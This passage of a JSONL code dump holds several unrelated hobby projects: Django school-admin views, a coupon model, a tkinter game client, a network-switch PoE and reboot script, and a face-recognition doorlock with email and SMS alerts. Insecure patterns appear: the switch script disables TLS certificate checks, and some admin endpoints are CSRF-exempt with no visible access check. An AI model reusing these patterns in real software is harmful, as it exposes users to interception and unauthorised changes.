request.POST[\"session_year\"]\n admin_id = request.POST[\"admin_id\"]\n profile_pic = request.FILES[\"profile\"]\n try:\n user = CustomUser.objects.get(id=admin_id)\n user.first_name=first_name\n user.last_name=last_name\n user.email=email\n user.username=username\n user.save()\n\n session_obj = SessionYear.objects.get(id=session_year)\n student.session_year=session_obj\n student.address=address\n student.gender=sex\n course=Courses.objects.get(id=course_id)\n student.course_id=course\n student.profile_pic=profile_pic \n student.save()\n messages.success(request,\"Successfully Edited Student\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n except:\n messages.error(request,\"Failed Edited Student\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n \n \n return render(request, 'hod/edit_student.html', context)\n\n\ndef edit_course(request,pk):\n course = Courses.objects.get(id=pk)\n context = {\n 'course': course\n }\n if request.method == \"POST\":\n course_name = request.POST[\"course\"]\n try:\n course.course_name=course_name\n course.save()\n messages.success(request,\"Successfully Edited Course\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n except:\n messages.error(request,\"Failed to Edit Course\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n return render(request, 'hod/edit_course.html',context)\n\n\ndef edit_subject(request,pk):\n subject = Subjects.objects.get(id=pk)\n courses = Courses.objects.all()\n staffs = CustomUser.objects.filter(user_type=2)\n context = {\n 'subject': subject,\n 'courses' : courses,\n 'staffs': staffs\n }\n if request.method == \"POST\":\n subject_name = request.POST[\"subject_name\"]\n course_id = request.POST[\"course\"]\n staff_id = request.POST[\"staff\"]\n staff = CustomUser.objects.get(id=staff_id)\n course = Courses.objects.get(id=course_id)\n try:\n subject.subject_name = subject_name\n subject.staff_id=staff\n subject.course_id=course\n subject.save()\n messages.success(request,\"Successfully Edited Subject\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n except:\n messages.error(request,\"Failed to Edit Subject\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n return render(request, 'hod/edit_subject.html',context)\n\ndef edit_session(request,pk):\n session_year = SessionYear.objects.get(id=pk)\n context = {\n 'session_year':session_year\n }\n if request.method == \"POST\":\n session_start_year = request.POST[\"session_start_year\"]\n session_end_year = request.POST[\"session_end_year\"]\n try:\n session_year.session_start_year = session_start_year\n session_year.session_end_year = session_end_year\n session_year.save()\n messages.success(request,\"Successfully Edited SessionYear\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n except:\n messages.error(request,\"Failed to Edit SessionYear\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n return render(request, 'hod/edit_session.html',context)\n\ndef student_feedback_message(request):\n feedbacks=FeedBackStudent.objects.all()\n context = {\n 'feedbacks':feedbacks\n }\n return render(request,'hod/student_feedback_message.html',context)\n\n@csrf_exempt\ndef student_feedback_message_replied(request):\n feedback_id=request.POST.get(\"id\")\n feedback_message=request.POST.get(\"message\")\n\n try:\n feedback=FeedBackStudent.objects.get(id=feedback_id)\n feedback.feedback_reply=feedback_message\n feedback.save()\n return HttpResponse(\"True\")\n except:\n return HttpResponse(\"False\")\n\ndef staff_feedback_message(request):\n feedbacks=FeedBackStaffs.objects.all()\n context = {\n 'feedbacks':feedbacks\n }\n return render(request,'hod/staff_feedback_message.html',context)\n\n@csrf_exempt\ndef staff_feedback_message_replied(request):\n feedback_id=request.POST.get(\"id\")\n feedback_message=request.POST.get(\"message\")\n\n try:\n feedback=FeedBackStaffs.objects.get(id=feedback_id)\n feedback.feedback_reply=feedback_message\n feedback.save()\n return HttpResponse(\"True\")\n except:\n return HttpResponse(\"False\")\n\ndef student_leave_view(request):\n leaves = LeaveReportStudent.objects.all()\n context = {\n 'leaves': leaves\n }\n return render(request,'hod/student_leave_view.html',context)\n\ndef student_approve_leave(request,pk):\n leave = LeaveReportStudent.objects.get(id=pk)\n leave.leave_status = 1\n leave.save()\n return redirect(\"hod:student_leave_view\")\n\ndef student_disapprove_leave(request,pk):\n leave = LeaveReportStudent.objects.get(id=pk)\n leave.leave_status = 2\n leave.save()\n return redirect(\"hod:student_leave_view\")\n\ndef staff_leave_view(request):\n leaves = LeaveReportStaff.objects.all()\n context = {\n 'leaves': leaves\n }\n return render(request,'hod/staff_leave_view.html',context)\n\ndef staff_approve_leave(request,pk):\n leave = LeaveReportStaff.objects.get(id=pk)\n leave.leave_status = 1\n leave.save()\n return redirect(\"hod:student_leave_view\")\n\ndef staff_disapprove_leave(request,pk):\n leave = LeaveReportStaff.objects.get(id=pk)\n leave.leave_status = 2\n leave.save()\n return redirect(\"hod:student_leave_view\")\n\ndef admin_view_attendance(request):\n subjects=Subjects.objects.all()\n session_year_id=SessionYear.objects.all()\n context = {\n 'subjects': subjects,\n 'session_year_id':session_year_id\n }\n return render(request,\"hod/admin_view_attendance.html\",context)\n\n@csrf_exempt\ndef admin_get_attendance_dates(request):\n subject=request.POST.get(\"subject\")\n session_year_id=request.POST.get(\"session_year_id\")\n subject_obj=Subjects.objects.get(id=subject)\n session_year_obj=SessionYear.objects.get(id=session_year_id)\n attendance=Attendance.objects.filter(subject_id=subject_obj,session_year=session_year_obj)\n attendance_obj=[]\n for attendance_single in attendance:\n data={\"id\":attendance_single.id,\"attendance_date\":str(attendance_single.attendance_date),\"session_year_id\":attendance_single.session_year.id}\n attendance_obj.append(data)\n\n return JsonResponse(json.dumps(attendance_obj),safe=False)\n\n\n@csrf_exempt\ndef admin_get_attendance_student(request):\n attendance_date=request.POST.get(\"attendance_date\")\n attendance=Attendance.objects.get(id=attendance_date)\n\n attendance_data=AttendanceReport.objects.filter(attendance_id=attendance)\n list_data=[]\n\n for student in attendance_data:\n data_small={\"id\":student.student_id.admin.id,\"name\":student.student_id.admin.first_name+\" \"+student.student_id.admin.last_name,\"status\":student.status}\n list_data.append(data_small)\n return JsonResponse(json.dumps(list_data),content_type=\"application/json\",safe=False)\n\ndef admin_profile(request):\n user=CustomUser.objects.get(id=request.user.id)\n context ={\n 'user': user\n }\n if request.method ==\"POST\":\n first_name=request.POST.get(\"first_name\")\n last_name=request.POST.get(\"last_name\")\n username=request.POST.get(\"username\")\n email=request.POST.get(\"email\")\n password=request.POST.get(\"password\")\n #try:\n user.first_name=first_name\n user.last_name=last_name\n user.username=username\n user.email=email\n # if password!=None and password!=\"\":\n # customuser.set_password(password)\n user.save()\n messages.success(request, \"Successfully Updated Profile\")\n return redirect(\"hod:admin_profile\")\n \n return render(request,\"hod/admin_profile.html\",context)\n\n","repo_name":"BINAH25/student-management-system","sub_path":"hod/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17581215097","text":"import logging\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.utils.translation import gettext_lazy as _\n\nfrom coupons.managers import ValidManager\n\nlogger = logging.getLogger(__name__)\n\n\nclass Coupon(models.Model):\n \"\"\"One time use coupons to apply a discount to a cart\"\"\"\n\n code = models.CharField(\n verbose_name=_(\"code\"),\n max_length=50,\n unique=True,\n help_text=_(\"Please use capital letters without spaces. Ex: SUMMER10\"),\n validators=[\n RegexValidator(\n \"^[A-Z0-9]*$\",\n \"Please use only uppercase letters and numbers without spaces.\",\n )\n ],\n )\n valid_from = models.DateTimeField(_(\"valid from\"), default=timezone.now)\n valid_to = models.DateTimeField(_(\"valid to\"))\n discount = models.PositiveIntegerField(\n _(\"discount\"),\n validators=[MinValueValidator(0), MaxValueValidator(100)],\n help_text=_(\"Percentage value (0 to 100%)\"),\n )\n active = models.BooleanField(_(\"active\"), default=True)\n\n class Meta:\n ordering = (\"valid_to\",)\n\n objects = models.Manager()\n valid = ValidManager()\n\n def clean(self):\n # Don't allow valid_from date to be in the past\n if self.valid_from.date() < timezone.now().date():\n raise ValidationError(\n {\"valid_from\": _(\"Valid from date cannot be in the past.\")},\n code=\"invalid\",\n )\n\n # Don't allow valid_to date to be less than valid_from date\n if self.valid_to and (self.valid_to < self.valid_from):\n raise ValidationError(\n {\"valid_to\": _(\"Valid to date cannot be less than Valid from date\")},\n code=\"invalid\",\n )\n\n def is_valid(self):\n \"\"\"\n Determine if the coupon itself is valid or not.\n The criteria is:\n - coupon should not already be redeemed (i.e. be active)\n - valid_from < now < valid_to\n \"\"\"\n\n now = timezone.now()\n return self.active and (self.valid_from < now < self.valid_to)\n\n def redeem(self):\n \"\"\"Used when a coupon is redeemed by a user so that it cannot be used again\"\"\"\n\n if not self.is_valid():\n raise ValidationError(\"coupon is already invalid 🤷â€�♀ï¸�\")\n\n logger.info(\"deactivating coupon(💣):%s...\" % self)\n\n self.active = False\n self.save()\n\n def __str__(self):\n return f\"{self.code}\"\n","repo_name":"gurupratap-matharu/falcon","sub_path":"coupons/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"29015248472","text":"from tkinter import StringVar, Canvas, Listbox\nfrom tkinter.ttk import Frame, Button\nimport threading\n\nimport protocol\nfrom tile import Point, ALL_TILES\nfrom board import Board, PLAYER_COLOURS\nfrom yamlLoader import YamlLoader\nfrom home import Home\n\nsettings = YamlLoader.load()\n\n\nclass Game(Frame):\n # Game settings\n TILE_PX = settings['pixel']['tile']\n BORDER_PX = settings['pixel']['border']\n HAND_SPACING_PX = settings['pixel']['hand_space']\n\n def __init__(self, parent, sock, home: Home, idnum):\n super().__init__(parent)\n self.parent = parent\n self.home = home\n self.pack()\n\n # Game menu settings\n self.board_width = home.border_width\n self.board_height = home.border_height\n self.hand_size = home.hand_size\n self.board_width_px = Game.TILE_PX * self.board_width\n self.board_height_px = Game.TILE_PX * self.board_height\n self.hand_width_px = Game.TILE_PX * self.hand_size + Game.HAND_SPACING_PX * (self.hand_size - 1)\n self.canvas_width_px = max(self.board_width_px, self.hand_width_px) + 2 * Game.BORDER_PX\n self.canvas_height_px = self.board_height_px + Game.TILE_PX + 3 * Game.BORDER_PX\n self.sock = sock\n\n self.infolock = threading.Lock()\n\n # player id\n self.idnum = idnum\n # player id -> name\n self.playernames = dict(home.player_names)\n\n # hand settings\n self.handlock = threading.Lock()\n self.hand_offset = Point(\n (self.canvas_width_px - self.hand_width_px) / 2,\n 2 * Game.BORDER_PX + self.board_height_px)\n self.hand = [None] * self.hand_size\n self.handrotations = [0] * self.hand_size\n\n # board settings\n self.boardlock = threading.Lock()\n self.board = Board(self.board_width, self.board_height)\n self.board.tile_size_px = Game.TILE_PX\n self.lasttilelocation = None\n self.location = None\n self.playernums = dict(home.player_nums) # idnum -> player number (turn order)\n self.playerlist = list(home.player_list)\n self.playerlistvar = StringVar(value=[self.playernames[i] for i in self.playerlist]) # // maybe need change\n self.eliminatedlist = []\n self.currentplayerid = None\n self.boardoffset = Point(Game.BORDER_PX, Game.BORDER_PX)\n\n self.selected_hand = 0\n self.handrects = [None] * self.hand_size\n\n self.bind('<>', lambda ev: self.clear_board())\n self.bind('<>', lambda ev: self.draw_board())\n self.bind('<>', lambda ev: self.draw_hand())\n self.bind('<>', lambda ev: self.draw_tokens())\n self.bind('<>', lambda ev: self.draw_turn())\n self.bind('<>', lambda ev: self.on_quit())\n\n self.create_widgets()\n self.game_runing = True\n\n def create_widgets(self):\n # create canvas and so on\n frame = Frame(self, width=self.canvas_width_px + 200, height=self.canvas_height_px)\n frame.grid(column=0, row=0)\n\n self.canvas = Canvas(frame, width=self.canvas_width_px,\n height=self.canvas_height_px, bg=\"white\")\n\n self.board.draw_squares(self.canvas, self.boardoffset, self.play_tile)\n\n message_x = self.canvas_width_px / 2\n message_y = Game.BORDER_PX / 2\n\n self.your_turn_text = self.canvas.create_text(message_x, message_y, anchor='center', text='Your turn!',\n fill='black', state='hidden')\n self.eliminated_text = self.canvas.create_text(message_x, message_y, anchor='center',\n text='You were eliminated!', fill='black', state='hidden')\n self.you_won_text = self.canvas.create_text(message_x, message_y, anchor='center', text='You won!',\n fill='black', state='hidden')\n\n hand_offset = self.hand_offset\n\n for i in range(len(self.hand)):\n cid = self.canvas.create_rectangle(hand_offset.x + (Game.TILE_PX + Game.HAND_SPACING_PX) * i,\n hand_offset.y,\n hand_offset.x + (\n Game.TILE_PX + Game.HAND_SPACING_PX) * i + Game.TILE_PX,\n hand_offset.y + Game.TILE_PX,\n fill='#bbb', outline='#000', width=2,\n tags=('hand_rect', 'hand_rect_{}'.format(i)))\n\n self.handrects[i] = cid\n\n self.canvas.tag_bind(cid, \"\", lambda ev, i=i: self.rotate_hand_tile(ev, i))\n\n self.set_selected_hand(0)\n\n self.board.draw_tiles(self.canvas, self.boardoffset)\n\n self.canvas.grid(column=0, row=0, columnspan=1, rowspan=2)\n\n self.quit = Button(frame, text=\"QUIT\", command=self.on_quit)\n self.quit.grid(column=1, row=0, sticky='n')\n\n self.playerlistbox = Listbox(frame, listvariable=self.playerlistvar)\n self.playerlistbox.grid(column=1, row=1, sticky='s')\n\n def set_selected_hand(self, index):\n self.canvas.itemconfigure('hand_rect', fill='#bbb', outline='#000', width=2)\n\n self.selected_hand = index\n self.canvas.itemconfigure('hand_rect_{}'.format(index), fill='#fff', outline='#bbb', width=4)\n\n def play_tile(self, x, y):\n if self.lasttilelocation != None and self.location == None:\n return\n if self.currentplayerid != self.idnum:\n return\n\n if self.sock:\n with self.infolock:\n idnum = self.idnum\n if idnum != None:\n with self.handlock:\n tileid = self.hand[self.selected_hand]\n rotation = self.handrotations[self.selected_hand]\n if tileid != None:\n self.sock.send(protocol.MessagePlaceTile(idnum, tileid, rotation, x, y).pack())\n\n def rotate_hand_tile(self, ev, hand_index):\n if hand_index == self.selected_hand:\n with self.handlock:\n self.handrotations[hand_index] = (self.handrotations[hand_index] + 1) % 4\n self.draw_hand()\n else:\n self.set_selected_hand(hand_index)\n\n def choose_starting_token(self, position):\n with self.boardlock:\n if self.lasttilelocation and not self.location and self.currentplayerid == self.idnum:\n x, y = self.lasttilelocation\n self.sock.send(protocol.MessageMoveToken(self.idnum, x, y, position).pack())\n\n def clear_board(self):\n self.canvas.configure(bg='white')\n self.canvas.itemconfigure('board_square', fill=\"#bbb\", activefill=\"#fff\")\n self.canvas.delete('board_tile')\n self.canvas.delete('selection_token')\n self.canvas.delete('token')\n\n def draw_board(self):\n self.board.draw_tiles(self.canvas, self.boardoffset)\n\n def draw_hand(self):\n hand_offset = self.hand_offset\n\n self.canvas.delete('handtile')\n\n with self.handlock:\n for i in range(len(self.hand)):\n if self.hand[i] != None:\n drawpoint = Point(hand_offset.x + (Game.TILE_PX + 10) * i, hand_offset.y)\n tile = ALL_TILES[self.hand[i]]\n tile.draw(self.canvas, Game.TILE_PX, drawpoint, self.handrotations[i], ('handtile'))\n\n def draw_tokens(self):\n with self.boardlock:\n if self.lasttilelocation and not self.location:\n x, y = self.lasttilelocation\n self.board.draw_selection_tokens(self.canvas, self.boardoffset, self.playernums, x, y,\n self.choose_starting_token)\n else:\n self.canvas.delete('selection_token')\n\n self.board.draw_tokens(self.canvas, self.boardoffset, self.playernums, self.eliminatedlist)\n\n def draw_turn(self):\n self.canvas.itemconfigure(self.you_won_text, state='hidden')\n self.canvas.itemconfigure(self.eliminated_text, state='hidden')\n self.canvas.itemconfigure(self.your_turn_text, state='hidden')\n\n if self.idnum in self.playernums:\n if self.idnum in self.eliminatedlist:\n self.canvas.itemconfigure(self.eliminated_text, state='normal')\n elif self.eliminatedlist and len(self.playerlist) == 1:\n self.canvas.itemconfigure(self.you_won_text, state='normal')\n elif self.currentplayerid == self.idnum:\n self.canvas.itemconfigure(self.your_turn_text, state='normal')\n\n playernum = self.playernums[self.idnum]\n playercolour = PLAYER_COLOURS[playernum]\n self.canvas.configure(bg=playercolour)\n\n def reset_game_state(self):\n\n with self.handlock:\n for i in range(len(self.hand)):\n self.hand[i] = None\n self.handrotations[i] = 0\n\n self.event_generate(\"<>\")\n\n with self.boardlock:\n self.board.reset()\n self.lasttilelocation = None\n self.location = None\n self.playernums = {}\n self.playerlist.clear()\n self.eliminatedlist.clear()\n self.currentplayerid = None\n\n self.event_generate(\"<>\")\n self.event_generate(\"<>\")\n self.event_generate(\"<>\")\n\n def set_player_turn(self, idnum):\n with self.boardlock:\n if not idnum in self.playernums:\n playernum = len(self.playernums)\n self.playernums[idnum] = playernum\n\n with self.infolock:\n playername = self.playernames[idnum]\n self.playerlist.append(idnum)\n\n self.playerlistvar.set([self.playernames[i] for i in self.playerlist])\n\n self.currentplayerid = idnum\n\n self.event_generate(\"<>\")\n\n def tile_placed(self, msg):\n\n with self.boardlock:\n idx = self.board.tile_index(msg.x, msg.y)\n self.board.tileids[idx] = msg.tileid\n self.board.tilerotations[idx] = msg.rotation\n self.board.tileplaceids[idx] = msg.idnum\n\n self.event_generate(\"<>\")\n\n with self.infolock:\n if self.idnum == msg.idnum:\n with self.handlock:\n selected = self.selected_hand\n\n if self.hand[selected] != msg.tileid:\n try:\n selected = self.hand.index(msg.tileid)\n except ValueError:\n return\n\n self.hand[selected] = None\n self.handrotations[selected] = 0\n\n self.event_generate(\"<>\")\n\n redrawtokens = False\n\n with self.boardlock:\n self.lasttilelocation = (msg.x, msg.y)\n if self.location == None:\n redrawtokens = True\n\n if redrawtokens:\n self.event_generate(\"<>\")\n\n def set_player_eliminated(self, idnum):\n\n with self.boardlock:\n with self.infolock:\n if idnum in self.playerlist:\n self.playerlist.remove(idnum)\n else:\n pass\n self.playerlistvar.set([self.playernames[i] for i in self.playerlist])\n\n if not idnum in self.eliminatedlist:\n self.eliminatedlist.append(idnum)\n\n self.event_generate(\"<>\")\n self.event_generate(\"<>\")\n\n def token_moved(self, msg):\n with self.boardlock:\n if msg.idnum == self.idnum:\n self.location = (msg.x, msg.y, msg.position)\n self.board.update_player_position(msg.idnum, msg.x, msg.y, msg.position)\n\n self.event_generate(\"<>\")\n\n def add_tile_to_hand(self, tileid):\n with self.handlock:\n for i in range(len(self.hand)):\n if self.hand[i] == None:\n self.hand[i] = tileid\n self.handrotations[i] = 0\n break\n self.event_generate(\"<>\")\n\n def on_quit(self):\n\n if self.game_runing:\n self.sock.send(protocol.MessageLeaveGame(self.idnum).pack())\n if self.parent:\n self.parent.destroy()\n","repo_name":"SleepyVirino/cits3002_2021_project","sub_path":"client/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":12633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15124903544","text":"#!/usr/bin/python3\nimport json\nimport os\nimport urllib.request\nimport ssl\nimport time\nimport getopt\nimport sys\nimport util\n\nssl._create_default_https_context = ssl._create_unverified_context\n\ndef req(method, endpoint, data, headers = {}):\n base_url = \"https://%s/\" % (os.environ[\"SWITCH_HOST\"])\n url = \"%s%s\" % (base_url, endpoint)\n\n headers = {\n \"Content-Type\": \"application/json\",\n \"Referer\": base_url,\n **headers\n }\n\n if method == \"GET\":\n req = urllib.request.Request(url, headers=headers, method=method)\n else:\n params = json.dumps(data).encode(\"utf8\")\n req = urllib.request.Request(url, data=params,\n headers=headers, method=method)\n try: response = urllib.request.urlopen(req)\n except urllib.error.HTTPError as e:\n util.prnt(\"[unify] %s\" % str(e), util.LOG_ERR)\n response = e\n except urllib.error.URLError as e:\n util.prnt(\"[unify] %s\" % str(e), util.LOG_ERR)\n response = e\n\n return response\n\ndef switch_ports():\n ports = os.environ[\"SWITCH_PORTS\"].split(\",\")\n token = auth()\n resp = req(\"GET\", \"api/v1.0/interfaces\", {}, {\"x-auth-token\": token})\n\n if resp.getcode() == 200:\n interfaces = json.loads(resp.read().decode(\"utf-8\"))\n for interface in interfaces:\n if interface[\"identification\"][\"id\"] in ports:\n original_status = interface[\"port\"][\"poe\"]\n interface[\"port\"][\"poe\"] = \"off\"\n resp = req(\"PUT\", \"api/v1.0/interfaces\", interface, {\"x-auth-token\": token})\n if resp.getcode() == 200:\n time.sleep(5)\n interface[\"port\"][\"poe\"] = original_status\n resp = req(\"PUT\", \"api/v1.0/interfaces\", interface, {\"x-auth-token\": token})\n if resp.getcode() == 200:\n util.prnt(\"[unify] Switched POE for port %s successfully\" % (interface[\"identification\"][\"id\"]))\n return True\n\n util.prnt(\"[unify] Failed to get POE back for port %s\" % (interface[\"identification\"][\"id\"]), util.LOG_ERR)\n return False\n else:\n util.prnt(\"[unify] Failed to switch POE off for port %s\" % (interface[\"identification\"][\"id\"]), util.LOG_ERR)\n return False\n else:\n util.prnt(\"[unify] Failed to get interfaces list\", util.LOG_ERR)\n\n return False\n\ndef reboot():\n token = auth()\n\n resp = req(\"GET\", \"api/v1.0/system/reboot\", {}, {\"x-auth-token\": token})\n if resp.getcode() == 200:\n util.prnt(\"[unify] Rebooted successfully\")\n return True\n\n util.prnt(\"[unify] Failed to reboot\", util.LOG_ERR)\n return False\n\ndef parse_options():\n\n try:\n opts, args = getopt.getopt(sys.argv[2:], \"c:\")\n except Exception as e:\n opts = []\n\n if (not opts):\n print(\"dio unify -c \")\n sys.exit(1)\n\n return opts[0][1]\n\ndef auth():\n token = \"\"\n resp = req(\"POST\", \"api/v1.0/user/login\", {\n \"username\": os.environ[\"SWITCH_USERNAME\"],\n \"password\": os.environ[\"SWITCH_PASSWORD\"]\n })\n\n if resp.getcode() == 200:\n headers = dict(resp.info())\n if \"x-auth-token\" in headers:\n token = headers[\"x-auth-token\"]\n else:\n util.prnt(\"[unify] Failed to get auth token from headers\", util.LOG_ERR)\n else:\n util.prnt(\"[unify] Failed to authenticate\", util.LOG_ERR)\n\n return token\n\n\ndef main():\n\n cmd = parse_options()\n if cmd == \"switch_ports\":\n switch_ports()\n elif cmd == \"reboot\":\n reboot()\n\n","repo_name":"bzzeke/wb-rules","sub_path":"services/modules/unify/unify.py","file_name":"unify.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14272092922","text":"from asyncio.windows_events import NULL\nimport cv2\nimport smtplib\nimport imghdr\nimport threading\nimport os\nimport sys\nfrom deepface import DeepFace\nfrom email.message import EmailMessage\nfrom PIL import Image\nfrom jinja2 import pass_environment\nfrom twilio.rest import Client\nimport tkinter as tk\nfrom attr import s\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\nfrom credentials import *\n\nflag=0\ncount=0\nframe=0\nframe1=NULL\nLINK=\"\"\nname=['']\naccess=['']\nvideo_capture=0\n\ndef web_cam():\n global video_capture\n global flag,count,frame,name,access\n cascPath = \"haarcascade_frontalface_default.xml\"\n faceCascade = cv2.CascadeClassifier(cascPath)\n\n video_capture = cv2.VideoCapture(0)\n no_face=0 \n down=0\n x=0\n y=0\n while True:\n ret, frame = video_capture.read()\n try:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n #to detect faces in each frame\n faces = faceCascade.detectMultiScale( \n gray,\n scaleFactor=1.1,\n minNeighbors=5, \n minSize=(200, 200),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n #to save image and draw rectangle when face is detected \n \n for (x, y, w, h) in faces:\n filename = 'faces/ddd.jpg'\n no_face=1\n cv2.imwrite(filename, frame)\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n \n count=count+1\n down=down+1\n\n if no_face==0:\n name[0]=''\n access[0]=''\n\n cv2.putText(frame,name[0],(x,y-10),cv2.FONT_HERSHEY_SIMPLEX, 0.8,(0, 255, 0), 1)\n cv2.putText(frame,access[0],(220,440),cv2.FONT_HERSHEY_SIMPLEX, 1,(0, 255, 0), 4) \n #to call verify function\n #call verify function only when the previous thread has finish execution\n if flag==0 and no_face==1 and down>100: \n flag=1\n while(True):\n try:\n t1 = threading.Thread(target=verify, args=())\n break\n except:\n print(\"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@verify\")\n pass\n down=0\n t1.start()\n\n #down=down+1\n no_face=0\n cv2.imshow('Video', frame)\n \n except:\n if flag==0:\n video_capture = cv2.VideoCapture(0)\n print(\"CAMERA TURNED ON\")\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n video_capture.release()\n cv2.destroyAllWindows()\n\n\n#function to perform face verification\ndef verify():\n global flag,count,frame,name\n models = [\"VGG-Face\", \"Facenet\", \"Facenet512\", \"OpenFace\", \"DeepFace\", \"DeepID\", \"ArcFace\", \"Dlib\", \"SFace\"]\n detectors = [\"opencv\", \"ssd\", \"mtcnn\", \"dlib\", \"retinaface\"]\n metrics = [\"cosine\", \"euclidean\", \"euclidean_l2\"]\n \n\n #comparing faces with the owners of the house.\n try:\n for file in os.listdir(\"owners\"):\n print(\"\\tOwners : \",file)\n verification=DeepFace.verify(\n img1_path=\"faces\\\\ddd.jpg\",\n img2_path=\"owners\\\\\"+file,\n model_name = models[2], distance_metric = metrics[1],\n detector_backend = detectors[1],\n enforce_detection=False)\n\n if verification.get('verified')==True:\n name=file.split('.')\n if(name[0].startswith(\"1\")):\n access[0]='Hello '+name[0][1:]\n filename = 'owners/'+'1'+file[1:]\n name[0]=name[0][1:]\n else:\n access[0]='Hello '+name[0]\n filename = 'owners/'+'1'+file\n \n print(\"%%%%%%%%%%%%%%%%% Access Granted %%%%%%%%%%%%%%%%\")\n current_owner=cv2.imread('owners/'+file)\n \n cv2.imwrite(filename, current_owner)\n flag=0\n count=0\n return\n except:\n print(\"%%%%%%%%%%%%%%%%%% No face deteacted %%%%%%%%%%%%%%%\")\n\n\n print(\"%%%%%%%%%%%%%%%%%%Comparing stranger face%%%%%%%%%%%%%%%%%%\")\n #comparing faces with last stranger's face so that email will not be sent again.\n try:\n for file in os.listdir(\"stranger\"):\n print(\"\\tStranger : \",file)\n verification=DeepFace.verify(\n img1_path=\"faces\\\\ddd.jpg\",\n img2_path=\"stranger\\\\\"+file,\n model_name = models[-2], distance_metric = metrics[-2],\n detector_backend = detectors[0],\n enforce_detection=False)\n if verification.get('verified')==True:\n name[0]='Stranger'\n access[0]='Access Denied'\n print(\"%%%%%%%%%%%%%%%%% Stranger again no email sent %%%%%%%%%%%%%%%%\")\n print(count)\n flag=0\n count=0\n return\n except:\n print(\"Stranger comparing error\")\n \n \n \n print('mail sending')\n filename1 = 'stranger/star.jpg'\n name[0]='Stranger'\n access[0]='Access Denied'\n cv2.imwrite(filename1, frame)\n while(True):\n try:\n t2 = threading.Thread(target=email_send, args=())\n t3 = threading.Thread(target=gui, args=())\n t2.start()\n t3.start()\n break\n except:\n print(count)\n print(\"@@@@@@@@@@@@@@@@@@@@@@stranger\")\n pass\n\n\n\n#function to send email notification to owner with stranger's image.\ndef email_send():\n msg=EmailMessage()\n msg['Subject']='Home Security'\n msg['From']='mysmart99mail@gmail.com'\n msg['To']='XXXXXXXXXXXXXXX@gmail.com'\n msg.set_content('An unknown face has been recognized at your doorlock!Image attached!!')\n \n with open('stranger\\\\star.jpg','rb') as f:\n file_data=f.read()\n file_type=imghdr.what(f.name)\n file_name=f.name\n\n msg.add_attachment(file_data,maintype='image',subtype=file_type,filename=file_name)\n\n with smtplib.SMTP('smtp.gmail.com',587) as smtp:\n smtp.ehlo()\n smtp.starttls()\n smtp.ehlo()\n smtp.login(\"mysmart99mail@gmail.com\",email_c)\n \n #image added\n #sfv\n smtp.send_message(msg)\n print(\"mail sent\")\n\n\ndef sms_send():\n global LINK,flag\n client = Client(account_sid, auth_token) \n \n message = client.messages.create( \n messaging_service_sid=msg_sid, \n body='ALERT; Video call link :'+str(LINK), \n to='+91XXXXXXXXXX' \n ) \n \n print(\"sms sent\")\n\n\ndef gui():\n print('the print')\n parent = tk.Tk()\n parent.geometry('300x100')\n print('the print1')\n\n frame1 = tk.Frame(parent)\n frame1.pack()\n print('the prin2')\n text_lab=tk.Label(parent, text='Do You want to call?').place(x=40,y=10)\n\n\n text_disp= tk.Button(frame1, \n text=\"Yes\", \n command=lambda: fun(parent))\n\n text_disp.pack(side=tk.LEFT,padx=25, pady=40)\n\n exit_button = tk.Button(frame1,\n text=\"No\",\n fg=\"black\",\n command=lambda: QUIT(parent))\n exit_button.pack(side=tk.RIGHT,padx=35,pady=40)\n print('the print4')\n parent.mainloop()\n\ndef on_closing():\n global flag\n flag=0\n print(\"ebfhrud\")\n\n\ndef QUIT(parent):\n global flag\n flag=0\n parent.quit()\n \n\ndef video_call(driver,mail_address,password):\n \n global LINK\n while(True):\n try:\n s=driver.find_element(\"xpath\",'//*[@id=\"drawer\"]/div/div[3]/div[1]/div/span[1]/a')\n s.click()\n print(\"sign in\")\n break\n except:\n pass\n\n #adding a wait so that next page load\n driver.implicitly_wait(2)\n\n # input Gmail\n #input username\n while(True):\n try:\n username=driver.find_element(\"xpath\",'//*[@id=\"identifierId\"]')\n username.click()\n username.send_keys(mail_address)\n\n #click next\n next1=driver.find_element(\"xpath\",'//*[@id=\"identifierNext\"]')\n next1.click()\n print(\"enter user name\")\n break\n except:\n pass\n \n #adding a wait so that next page load\n driver.implicitly_wait(2)\n # input Password\n while(True):\n try:\n pswd=driver.find_element(\"xpath\",'//*[@id=\"password\"]/div[1]/div/div[1]/input')\n pswd.click()\n pswd.send_keys(password)\n\n #click next\n next2=driver.find_element(\"xpath\",'//*[@id=\"passwordNext\"]')\n next2.click()\n print(\"password entered\")\n break\n except:\n pass\n #adding a wait so that next page load\n driver.implicitly_wait(7)\n\n\n while(True):\n try:\n start_button=driver.find_element(\"xpath\",'//*[@id=\"yDmH0d\"]/c-wiz/div/div[2]/div/div[1]/div[3]/div/div[1]/div[1]/div/button/span')\n start_button.click()\n\n\n 